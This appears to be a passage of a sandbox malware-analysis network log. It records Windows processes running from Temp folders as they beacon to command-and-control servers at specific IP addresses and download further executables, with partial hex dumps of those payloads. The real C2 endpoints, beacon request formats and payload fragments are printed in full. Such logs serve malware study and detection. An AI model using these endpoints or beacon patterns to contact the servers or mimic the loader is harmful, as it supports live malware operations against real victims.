Dec 22, 2024 02:17:46.221056938 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:45 GMT Content-Type: application/octet-stream Content-Length: 2955776 Last-Modified: Sun, 22 Dec 2024 00:18:56 GMT Connection: keep-alive ETag: "67675af0-2d1a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 50 00 00 04 00 00 0a 06 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(PP@P.@M$a$$ $h@.rsrc$x@.idata $z@syphqzjl+$v+\|@tdmszgwn@P,@.taggant0PP",@
Dec 22, 2024 02:17:46.221126080 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:46.221165895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:46.221501112 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:17:46.221537113 CET	1236	IN	Data Raw: 4f 12 67 50 91 ca 81 ed 51 d7 c2 64 5f 8f 25 0e 0d ab e9 03 91 87 30 d4 38 8f 61 33 2d 0b 5a ff 20 49 52 e6 10 41 4a 0e 6c e5 3c 92 72 71 28 e0 88 6f 3a e4 84 ff 29 20 5d 8f 1d bd f7 a0 11 ad 4d 93 05 bc 45 0d 5a e4 4f b7 2d 3c 35 af e9 e4 12 70 Data Ascii: OgPQd_%08a3-Z IRAJl<rq(o:) ]MEZO-<5pw_\|SjD & 3z,TTad/=S,#/FGJOMdhPHO9l2e )itq(y}DM3<0"
Dec 22, 2024 02:17:46.221571922 CET	1236	IN	Data Raw: 23 67 28 a8 2e 7f 5e ed 4d 90 6c 41 b9 c4 be 55 82 a7 a5 9d 1f 6f f5 d4 d7 6e 05 78 1e 9f 98 b5 c4 e9 ea a2 15 ee c8 14 74 e2 01 66 e9 e6 e9 0f 3c 22 eb 7e f6 c6 84 14 18 2a f0 cd 7f 91 37 57 d5 d8 26 84 95 fe ea 32 7d 00 28 5f 5d ef e9 50 9e 8e Data Ascii: #g(.^MlAUonxtf<"~7W&2}(_]Pjd`~1UR,\vXC]eYj+q\|wPR~N9wD##86R[D"M`1[L'r%2I'kzE-Gdkzfca{%y+:9F"h%L\Le
Dec 22, 2024 02:17:46.221615076 CET	1236	IN	Data Raw: 4e da 51 50 23 07 03 7c 95 99 ef dc 1d a8 a2 ce 22 2b f3 63 4e f8 d9 e9 5e c9 99 dd d0 8f 05 6c 65 69 ff 71 d6 d7 b1 e2 e8 0b 04 e4 98 cc ad 25 1b 75 70 e5 14 a7 75 00 7e 9b 94 e9 ee 4b fa eb 56 af f7 df c8 f8 09 69 23 51 3a 04 23 97 31 50 39 10 Data Ascii: NQP#\|"+cN^leiq%upu~KVi#Q:#1P9*SU#eRPj#=N^P#3H&@&#doo~xW.)0$q!X{E:k`h4M#pVz/lgZ?&/g-IL
Dec 22, 2024 02:17:46.222107887 CET	1236	IN	Data Raw: 14 c2 f7 08 af b3 c9 58 96 2e ea e7 af 0e ce 16 5d 9d f1 2f 95 18 2d d1 15 f7 e9 e1 8c cc 41 d4 7a 02 83 53 1d 98 21 e5 b0 0b 24 e0 35 e9 52 e0 c4 9d 02 98 15 9f 6c 5c 59 1b 4b f4 ec 9d 23 c8 1e 37 6f f5 42 e2 e9 e3 39 24 0a 2e 5d db 52 ec b0 c9 Data Ascii: X.]/-AzS!$5Rl\YK#7oB9$.]R1#eMOU#aM>*l<&]T=/)QLW'6fmqO$AX LlydzH.]+YJQTU1^'!T#oi
Dec 22, 2024 02:17:46.222146034 CET	1224	IN	Data Raw: f0 90 a2 5a 1f dc f2 df 50 35 e6 e1 1c c3 25 78 95 cf 20 16 e4 8f 09 08 a1 bb f7 ec b0 9c 0a 53 97 c7 f7 db 5c 0b ba 59 55 9a 2a d1 80 e7 fe e1 ad 8f fd 55 97 84 ec 52 d6 0c 51 3c 17 a0 59 27 ad a0 26 b0 1f 24 62 51 23 0f 2a fb 98 1b b0 e2 94 17 Data Ascii: ZP5%x S\YUURQ<Y'&$bQ#&d/d''5]'{UO)2(K&Tb-jyW2SSJ%>8!PVu4iU=Ok%Z(*\6."oO#e? Ol8&%YR]C(SGf!<8m#K
Dec 22, 2024 02:17:46.222182989 CET	1236	IN	Data Raw: 58 9d f1 2b 97 eb 23 dc 28 1a ec a8 81 9d f1 4f 91 83 6d 11 13 89 88 4a 35 1b fb 0d a9 98 5d 56 1f 74 e3 fd 1a 2b 66 e2 bc a9 d9 4e 3c 5e e3 64 d9 43 23 dd 6c 14 e6 51 44 9c f7 b3 ce 88 13 0c e1 0b 0e a8 2f db 66 0e b8 a9 f7 af 1e 73 ea b3 ae c9 Data Ascii: X+#(OmJ5]Vt+fN<^dC#lQD/fsvL#.T1kK!hM/HG3\"$1'4"Ot-h6=4/L#%q'r*7&Y`P#Q$MPO:&S[cd#ih0K88h{u
Dec 22, 2024 02:17:46.340903997 CET	1236	IN	Data Raw: 2b 98 ed 93 91 cb 39 3e 94 9b 04 ba 2d 91 47 a3 fb e0 fc 23 29 59 70 1f 57 df 69 19 5e 3b 2e ea 38 dd b8 ba 97 b5 00 90 a2 bd 03 20 1a a6 f5 21 9a 75 03 db 51 fd 12 0a fb 5d 31 ba 1e 78 02 96 65 a5 45 9c 5d 1d 03 f0 21 0c fe 53 49 6b 96 1e 9b c8 Data Ascii: +9>-G#)YpWi^;.8 !uQ]1xeE]!SIk.Edqx)Rwp7gIWjGIhT8F1hD_y7j@n?o=a5Ik2u"3n!8S4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50039	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:48.813936949 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:49.674402952 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:49 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50051	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:51.766829967 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:53.063509941 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:52 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50061	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:54.509139061 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019810001&unit=246122658369
Dec 22, 2024 02:17:55.833525896 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50067	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:55.047255993 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:17:56.353044033 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:56 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50069	185.215.113.16	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:56.138953924 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 22, 2024 02:17:57.454093933 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:56 GMT Content-Type: application/octet-stream Content-Length: 965120 Last-Modified: Sun, 22 Dec 2024 00:16:25 GMT Connection: keep-alive ETag: "67675a59-eba00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 4a 5a 67 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 0a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELJZgg"w@lD@@@d\|@Nu4@.text `.rdata@@.datalpH@.rsrcN@P@@.relocuvD@B
Dec 22, 2024 02:17:57.454159021 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 22, 2024 02:17:57.454195976 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 22, 2024 02:17:57.454452038 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 22, 2024 02:17:57.454488993 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 22, 2024 02:17:57.454524040 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 22, 2024 02:17:57.454560995 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 22, 2024 02:17:57.454931974 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 22, 2024 02:17:57.454967022 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 22, 2024 02:17:57.455003023 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 22, 2024 02:17:57.573865891 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50078	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:58.129453897 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:59.421688080 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:59 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50087	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:01.723011971 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:03.033238888 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:02 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50089	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:02.894839048 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019811001&unit=246122658369
Dec 22, 2024 02:18:04.221860886 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50096	185.215.113.16	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:04.544291019 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 22, 2024 02:18:05.847573996 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:04 GMT Content-Type: application/octet-stream Content-Length: 2809344 Last-Modified: Sun, 22 Dec 2024 00:16:59 GMT Connection: keep-alive ETag: "67675a7b-2ade00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 d9 47 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+G+`Ui`D @ @ @.rsrcD``@.idata f@osxguznn`Ph@nksckbfu +@.taggant@ +"@
Dec 22, 2024 02:18:05.847624063 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:05.847662926 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:05.847886086 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:05.847924948 CET	496	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:05.848032951 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:05.848063946 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:05.848099947 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:05.848134995 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
